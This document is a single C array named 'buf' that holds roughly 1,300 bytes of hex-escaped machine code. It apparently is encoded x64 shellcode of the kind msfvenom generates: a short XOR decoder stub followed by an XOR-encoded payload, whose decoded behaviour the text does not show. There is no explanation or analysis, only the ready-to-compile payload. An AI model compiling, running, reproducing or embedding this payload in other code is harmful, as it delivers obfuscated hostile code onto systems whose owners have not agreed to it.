unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\x4e\xff\xff\xff\x48\x8d\x05\xef"
"\xff\xff\xff\x48\xbb\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\x48"
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x94\x62\x74"
"\xba\xb0\x4a\xce\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xea"
"\x27\x06\xfc\xb3\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xab\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xeb\x27\x38\xfc\xf2\x4b\xcf\x36\xeb\x27\x78"
"\xfc\xba\x4b\xcb\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xea"
"\x27\x38\xfc\xba\x4b\xcf\x36\xe8\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xab\x25\x38\xfc\xb2"
"\x4b\xcf\x36\xab\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xef\x27\x38\xfc\xb2\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xed\x27\x38\xfc\xb3\x4b\xcf"
"\x36\xe8\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xab\x25\x38\xfc\xb2\x4b\xcf\x36\xf3\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xef"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xe7\x27\x38\xfc\xb3\x4b\xcf\x36\xed\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\x8b\x25\x38"
"\xfc\xb2\x4b\xcf\x36\x95\x27\x38\xfc\xb2\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xfb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xf9\x27\x38\xfc\xb1"
"\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\x0b\x25\x38\xfc\xb2\x4b\xcf\x36\xdc"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xea\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xf7\x27\x38\xfc\xb0\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xcb"
"\x24\x38\xfc\xb2\x4b\xcf\x36\x6b\x26\x38\xfc\xb2\x4b\xcf"
"\x36\xed\x27\x38\xfc\xbd\x4b\xcf\x36\xe3\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xf3\x27\x38\xfc\xb2\x4b\xcf\x36\xcf\x27\x38"
"\xfc\xb1\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\x4b\x23\x38\xfc\xb2\x4b\xcf"
"\x36\x89\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xea\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xc7\x27\x38\xfc\xb6\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xfb\x22\x38\xfc\xb2\x4b\xcf\x36\x93\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xee\x27\x38\xfc\xb1\x4b\xcf\x36\xe3\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xf3\x27\x38\xfc\xb2\x4b\xcf\x36\xda"
"\x14\x0b\xcb\xb8\x7f\xfd\x73\x85\x53\x4a\x99\xc0\x6b\xab"
"\x43\xcb\x53\x5d\x84\xc6\x2e\xef\x0c\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\x51\x36\x38\xfc\xb2\x03\x76\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x8d\xea\x27\x38\xfc\x0a\x4f\xcf\x36\xeb"
"\xea\xb8\x46\xf2\x4b\xcf\x36\xa3\x9e\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x83\xfc\xb2\x4b\xcf\x8e\xe8\x27\x38\xfc\x7f"
"\xcb\xa9\xbd\xef\x02\x38\xfc\xb2\x4b\xa9\xbd\xf7\x02\x38"
"\xfc\xb2\x4b\xa9\x0f\x28\x52\x1f\x46\xb7\x4b\xcf\x36\xa3"
"\x9e\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x83\xfd\xb2\x4b\xcf"
"\x8e\xef\x27\x38\xfc\x7f\xcb\x77\x37\xeb\x27\x38\x47\xb2"
"\x4b\xcf\x36\x26\xa7\x80\xfd\xb2\x4b\xcf\x8d\xea\x27\x38"
"\xfc\x7f\xcb\xcf\x36\xeb\x09\x5a\x8f\xc1\x4b\xe1\x52\x8a"
"\x53\x59\xfc\x9c\x3f\xaa\x4e\x9f\x27\x16\x8f\xda\x38\xbb"
"\x44\x9f\x46\x5a\xfc\x9c\x38\xb6\x5b\x9f\x46\x5a\xfc\x9c"
"\x38\xbb\x44\x9f\x46\x5a\xfc\x9c\x39\xaa\x5a\x8a\x09\x4c"
"\x99\xca\x3f\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xea\x27\x38\xfc\xb6"
"\x4b\x3e\xc9\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb1\x4b\xce\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x38\xfc\xb1\x4b\xcd\x36\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb1\x4b\xcc\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xf9\x27\x38\xfc\xb2\x4b\xce"
"\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xf2\x27\x38\xfc\xb2\x4b\x3e\xc9\xab\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xcf"
"\x27\x38\xfc\xb2\x4b\xcd\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xc3\x27\x38\xfc\xb2"
"\x4b\x3e\xc9\xee\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xdb\x27\x38\xfc\xb2\x4b\xcd\x36\xee"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xdc\x27\x38\xfc\xb2\x4b\xcd\x36\xec\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xd5\x27\x38"
"\xfc\xb2\x4b\x3e\xc9\xfa\x27\x38\xfc\xb2\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xbb\x27\x38\xfc\xb2\x4b\xcc"
"\x36\xdd\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xbf\x27\x38\xfc\xb2\x4b\xcc\x36\xa0\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xb0"
"\x27\x38\xfc\xb2\x4b\xcc\x36\x99\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xa2\x27\x38\xfc\xa2"
"\x4b\xcc\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xeb\x09\x16\xd3\xd3\x38\xa2\x00\xdf"
"\x08\x59\x8f\xdf\x7b\xfc\x18\x98\x27\x4d\x95\xdc\x3b\xba"
"\x42\xeb\x52\x51\x92\xc2\x3e\xbb\x69\x87\x42\x56\xfc\xdf"
"\x38\xa8\x36\x87\x42\x56\xa3\xdf\x38\xa8\x36\x86\x54\x5f"
"\x9f\xdf\x3b\xcf\x46\x99\x48\x55\x8c\xc6\x4b\xbf\x44\x84"
"\x4a\x48\x88\xed\x27\xaa\x58\xeb\x78\x4b\x88\xd3\x39\xbb"
"\x36\xb8\x6e\x09\xfc\xf3\x07\x80\x64\xb8\x16\x38\xaf\xfb"
"\x05\x80\x78\xda\x27\x38\xfc\xb2\x4b\xcf\x36\xeb\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xec\x27\x38\xfc\xb2\x4b\xcf\x36\xea"
"\x27\x38\xfc\xb1\x4b\xcf\x36\xec\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xc9\x27\x38\xfc\xb2\x4b\xcf\x36\xea\x27\x38\xfc\xb0"
"\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xd1\x27\x38"
"\xfc\xb2\x4b\xcf\x36\xe0\x27\x38\xfc\xb1\x4b\xcf\x36\xee"
"\x27\x38\xfc\xb2\x4b\xcf\x36\xa9\x27\x38\xfc\xb2\x4b\xcf"
"\x36\xe0\x27\x38\xfc\xb0\x4b\xcf\x36\xeb\x27\x38\xfc\xb2"
"\x4b\xcf\x36\xb9\x27\x38\xfc\xb2\x4b\xcf\x36\xea\x27\x38"
"\xfc\xb1\x4b\xcf\x36\xeb\x27\x38\xfc\xb2\x4b\xcf\x36\xeb"
"\x27\x38\xfc\xb2\x4b\xcf\x36";
